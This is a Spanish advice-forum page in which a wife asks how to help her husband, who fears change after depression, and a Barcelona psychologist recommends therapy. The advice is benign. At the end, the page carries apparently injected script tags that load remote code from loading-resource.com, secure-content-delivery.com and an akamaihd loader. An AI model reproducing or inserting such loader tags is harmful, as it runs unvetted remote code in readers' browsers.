Miedo después de una depresión

Buenos días, intentaré explicarle mi caso.

Conocí a mi marido cuando ya estaba acabando una depresión de un año y medio aproximadamente...y lo logró. Me comenta que después de superar la depresión ya no es la misma persona y le da miedo aceptar nuevos cambios en su vida. Tiene miedo a que todo le vuelva a sobrepasar (el motivo de la depresión), tener más responsabilidades de las que tiene y no sé como ayudarle porque parece que está estancado.

No sé como ayudarle ni sabe como ayudarse porque enseguida se estresa por todo y son tonterías la mayoría de las veces.

Un saludo y gracias.

1 respuesta

Respuesta

Existen muchos tipos de depresión y grados, si tu marido estuvo 1 año y medio entiendo que fue un período muy díficil y me puedo hacer a la idea de que tipo de depresión sería. Aunque no me dices tratamiento, ni cómo la superó, que es muy importante.

Ésto que comentas es normal que le pase, mi hipótesis es que ésta depresión le ocasionó un trauma y unas heridas emocionales por las que no quiere volver a pasar.

También entiendo tu postura como pareja, de querer ayudarle y no saber cómo.

Mi consejo es que puedas hablar con él y recomendarle que vaya a un psicólogo-psicoterapeuta que pueda abordar la situación y empezar a desmontar y trabajar las secuelas que le quedaron de la anterior depresión. A partir de ahí podra ir trabajando emociones, sentimientos creencias,... y seguro que le ayudará a tirar adelante.

Yo tengo consulta en Barcelona, por lo que si necesitaís ayuda os podría atender, si vivís fuera de Barcelona podría recomendaros profesionales.

Os deseo lo mejor.

Para cualquier cosa, contactarme de nuevo.

Saludos

Valorar la respuesta, gracias

Merxe

<div id="__tbSetup"> </div><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={ADD4C8C0-6538-446B-B4B5-B36E0FD14479}&d=2012-5-26&s=http://www.todoexpertos.com/mitodoexpertos/question/ekwrpoqzj8fsy/miedo-despues-de-una-depresion"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>